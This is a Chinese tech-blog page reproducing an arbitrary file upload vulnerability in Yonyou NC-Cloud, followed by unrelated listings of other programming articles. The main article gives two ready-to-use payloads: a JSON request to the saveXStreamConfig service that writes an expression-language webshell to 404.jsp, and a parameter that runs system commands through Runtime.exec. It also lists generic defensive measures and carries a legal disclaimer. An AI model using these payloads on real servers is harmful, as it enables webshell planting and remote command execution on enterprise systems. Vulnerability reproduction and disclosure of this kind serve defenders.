当前位置：首页 > news >正文

用友全版本任意文件上传漏洞复现

news 2025/12/25 2:57:24

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。
文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

漏洞原理

用友NC-Cloud最近爆出存在全版本任意文件上传漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用，目前不明确此漏洞适用的最低版本。攻击者可以通过该漏洞将任意文件上传至服务器，并以此将webshell上传至服务器，从而获得服务器的命令执行权限。

漏洞利用

利用此漏洞需要俩段poc

第一段POC:

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}

执行后有两种结果，一种是404了，另一种是200，经测试这两种回显都是上传成功。

第二段POC来进行命令执行：

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

漏洞复现-POC

防御建议

要防御用友NC-Cloud的全版本任意文件上传漏洞问题，以下是一些常见的防御措施：

及时升级补丁：确保用友NC-Cloud的软件版本处于最新状态，及时应用由供应商发布的安全补丁和更新。这有助于修复已知漏洞并提高系统的安全性。
限制文件上传：通过限制用户上传文件的类型、大小和目标路径，可以有效减少任意文件上传漏洞的风险。例如，验证文件扩展名和内容，使用白名单机制，只允许特定的文件类型上传。
文件上传验证：在服务器接收到上传文件时，进行文件验证是很重要的。可以使用安全的文件验证机制，例如校验文件的魔术字节、文件头信息、文件结尾等，以确保上传的文件是预期的有效文件，并阻止上传恶意文件。
强化访问控制：实施严格的访问控制措施，包括强密码策略、角色权限管理和多因素身份验证，以减少未授权访问和滥用漏洞的风险。
安全审计和监控：实施安全审计和监控机制，定期检查系统日志、访问日志和上传文件日志，及时发现异常活动和潜在的攻击行为。
安全教育和培训：对系统管理员和用户进行安全教育和培训，提高其安全意识，让他们了解常见的安全威胁和最佳实践，以便正确地使用系统和应对潜在威胁。

用友全版本任意文件上传漏洞复现

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章&#xff0c…...

编程日记 2023/7/26 21:43:41

程序员面试系列，MySQL常见面试题？

原文链接一、索引相关的面试题 （1）索引失效的情况有哪些在MySQL查询时，以下情况可能会导致索引失效，无法使用索引进行高效的查询： 数据类型不匹配：如果查询条件中的数据类型与索引列的数据类型不匹配&…...

编程日记 2023/7/26 21:42:40

前端Web实战：从零打造一个类Visio的流程图拓扑图绘图工具

前言大家好，本系列从Web前端实战的角度，给大家分享介绍如何从零打造一个自己专属的绘图工具，实现流程图、拓扑图、脑图等类Visio的绘图工具。你将收获免费好用、专属自己的绘图工具前端项目实战学习如何从0搭建一个前端项目等基础框架项…...

编程日记 2023/7/26 21:41:39

2023牛客暑期多校第二场部分题解

索引 ABCDEFGHIK A 队友开的题，说是其实就是问能不能用若干个数异或出来某个数。应该就是线性基板子，然后他写了一下就过了。 B 一开始看没什么人过不是很敢开，结果到后面一看题——这不是最大权闭合子图板子吗？？…...

编程日记 2023/7/26 21:40:38

20230724将真我Realme手机GT NEO3连接到WIN10的电脑的步骤

20230724将真我Realme手机GT NEO3连接到WIN10的电脑的步骤 2023/7/24 23:23 缘起：因为找使用IMX766的手机，找到Realme手机GT NEO3了。同样使用IMX766的还有：Redmi Note12Pro 5G IMX766 旗舰影像 OIS光学防抖 OLED柔性直屏 8GB256GB时光蓝现…...

编程日记 2023/7/26 21:39:37

黑马 pink h5+css3+移动端前端

网页概念网页是网站的一页,网页有很多元素组成,包括视频图片文字视频链接等等,以.htm和.html后缀结尾,俗称html文件 HTML 超文本标记语言,描述网页语言,不是编程语言,是标记语言,有标签组成超文本指的是不光文本,还有图片视频等等标签常用浏览器 firefox google safari…...

编程日记 2023/7/26 21:38:36

Docker的七项优秀实践

众所周知，作为一个文本文档，Dockerfile包含了用户创建镜像的所有命令和说明。Docker可以通过读取Dockerfile中指令的方式，去自动构建镜像。因此，大家往往认为编写Dockerfile理应非常简单，只需从互联网上选择一个示例&a…...

编程日记 2023/7/26 21:37:35

【数据结构】24王道考研笔记——图

六、图目录六、图定义及基本术语图的定义有向图以及无向图简单图以及多重图度顶点-顶点间关系连通图、强连通图子图连通分量强连通分量生成树生成森林边的权、带权网/图特殊形态的图图的存储及基本操作邻接矩阵邻接表法十字链表邻接多重表分析对比图的基本操作图的遍历广度…...

编程日记 2023/7/26 21:36:34

zabbix钉钉报警

登录钉钉客户端,创建一个群,把需要收到报警信息的人员都拉到这个群内. 然后点击群右上角的"群机器人"->"添加机器人"->"自定义", 记录该机器人的webhook值。添加机器人在钉钉群中，找到只能群助手添加机器人选择自定义机…...

编程日记 2023/7/26 21:35:33

Spring 源码解读

1、Spring 的结构组成 1.1、核心类介绍 Spring 中有两个最核心的类 1 DefaultListableBeanFactory XmlBeanFactory 继承自 DefaultListableBeanFactory，而DefaultListableBeanFactory 是整个 bean加载的核心部分，是 Spring 注册及加载 bean 的默认实现…...

编程日记 2023/7/26 21:34:32

练习时长两年半的网络安全防御“first”

1.网络安全常识及术语下边基于这次攻击演示我们介绍一下网络安全的一些常识和术语。资产任何对组织业务具有价值的信息资产，包括计算机硬件、通信设施、 IT 环境、数据库、软件、文档资料、信息服务和人员等。网络安全网络安全是指网络系统的硬件、软件及…...

编程日记 2023/7/26 21:33:31

HttpRunner自动化测试之响应中文乱码处理

响应中文乱码： 当调用接口，响应正文返回的中文是乱码时，一般是响应正文的编码格式不为 utf-8 导致，此时需要根据实际的编码格式处理示例： 图1中 extract 提取title标题，output 输出 title 变量值&#x…...

编程日记 2023/7/26 21:32:30

因为今天突然忘了命令，记下来方便以后查看 pom文件的依赖 jar包路径进入idea中命令窗输入命令 mvn install:install-file -DfileD:\Project\spring-cloud\dubbo-api\target\dubbo-api-1.0-SNAPSHOT.jar -DgroupIdcom.wmx -DartifactIddubbo-api -Dversion1.0…...

编程日记 2023/7/26 21:31:29

zookeeper学习（一） Standalone模式（单机模式）安装

安装准备 centos7环境jdk1.8环境zookeeper安装包安装jdk 上传jdk安装包解压安装包到目录中 tar -zxvf jdk-8u361-linux-x64.tar.gz如果需要指定目录可以在后面加上 -C，如 tar -zxvf jdk-8u361-linux-x64.tar.gz -C 目录配置jdk环境变量 vim /etc/profile打开…...

编程日记 2023/7/26 21:30:28

native webrtc支持切换音频采集设备和获取裸流

https://www.yuque.com/caokunchao/rtendq/oq8w3qgs3g59whru 前言版本webrtc m96 1、修改webrtc m96代码，向外提供一个adm指针的接口出来 2、外部来获取指针进行设备的选择 3、外部获取音频裸流，麦克风或者扬声器的数据修改webrtc代码 1、修改H:\w…...

编程日记 2023/7/26 21:29:27

HR怎么看待PMP证书呢？

在当今竞争激烈的职场环境中，拥有专业的证书已经成为了许多人提升职业竞争力的必要途径。PMP证书作为项目管理领域的国际认证，备受HR和企业的青睐。那么，HR在招聘和评估员工时，究竟是如何看待PMP证书的呢？ 首先&#x…...

编程日记 2023/7/26 21:28:26

API接口：如何通过使用手机归属地查询

随着手机普及率的不断增加，手机号码的信息查询也成为了一个非常实用的功能。本文将介绍如何通过使用手机归属地查询API接口实现查询手机号码所在地的功能。首先，我们需要一个可以查询手机号码所在地的API接口。目前市面上有很多免费或付费的API接口可供…...

编程日记 2023/7/26 21:27:24

小创业公司死亡剧本

感觉蛮真实的；很多小创业公司没有阿里华为的命，却得了阿里华为的病。小的创业公司要想活无非以下几点： 1 现金流，现金流，现金流； 2 产品，找痛点，不要搞伪需求； 3 根据公司…...

编程日记 2023/7/26 21:26:20

国产化的接口测试、接口自动化测试工具Apipost的介绍及使用

Apipost介绍： Apipost是 API 文档、API 调试、API Mock、API 自动化测试一体化的研发协作赋能平台，它的定位 Postman Swagger Mock JMeter。 Apipost 是接口管理、开发、测试全流程集成工具，能支撑整个研发技术团队同平台工作&#xff0…...

编程日记 2023/7/26 21:25:19

【MySQL】不允许你不知道如何插入数据

🎬 博客主页：博主链接 🎥 本文由 M malloc 原创，首发于 CSDN🙉 🎄 学习专栏推荐：LeetCode刷题集 🏅 欢迎点赞 👍 收藏 ⭐留言 📝 如有错误敬请指正&#xff0…...

编程日记 2023/7/26 21:24:18

基于算法竞赛的c++编程（28）结构体的进阶应用

结构体的嵌套与复杂数据组织在C中，结构体可以嵌套使用，形成更复杂的数据结构。例如，可以通过嵌套结构体描述多层级数据关系： struct Address {string city;string street;int zipCode; };struct Employee {string name;int id;…...

编程新知 2025/11/16 19:06:23

QMC5883L的驱动

简介本篇文章的代码已经上传到了github上面，开源代码作为一个电子罗盘模块，我们可以通过I2C从中获取偏航角yaw，相对于六轴陀螺仪的yaw，qmc5883l几乎不会零飘并且成本较低。参考资料 QMC5883L磁场传感器驱动 QMC5883L磁力计…...

编程新知 2025/7/21 15:40:47

【网络安全产品大调研系列】2. 体验漏洞扫描

前言 2023 年漏洞扫描服务市场规模预计为 3.06（十亿美元）。漏洞扫描服务市场行业预计将从 2024 年的 3.48（十亿美元）增长到 2032 年的 9.54（十亿美元）。预测期内漏洞扫描服务市场 CAGR（增长率&…...

编程新知 2025/12/20 17:25:26

如何为服务器生成TLS证书

TLS（Transport Layer Security）证书是确保网络通信安全的重要手段，它通过加密技术保护传输的数据不被窃听和篡改。在服务器上配置TLS证书，可以使用户通过HTTPS协议安全地访问您的网站。本文将详细介绍如何在服务器上生成一个TLS证…...

编程新知 2025/12/17 5:54:30

laravel8+vue3.0+element-plus搭建方法

创建 laravel8 项目 composer create-project --prefer-dist laravel/laravel laravel8 8.* 安装 laravel/ui composer require laravel/ui 修改 package.json 文件 "devDependencies": {"vue/compiler-sfc": "^3.0.7","axios": …...

编程新知 2025/10/15 0:25:46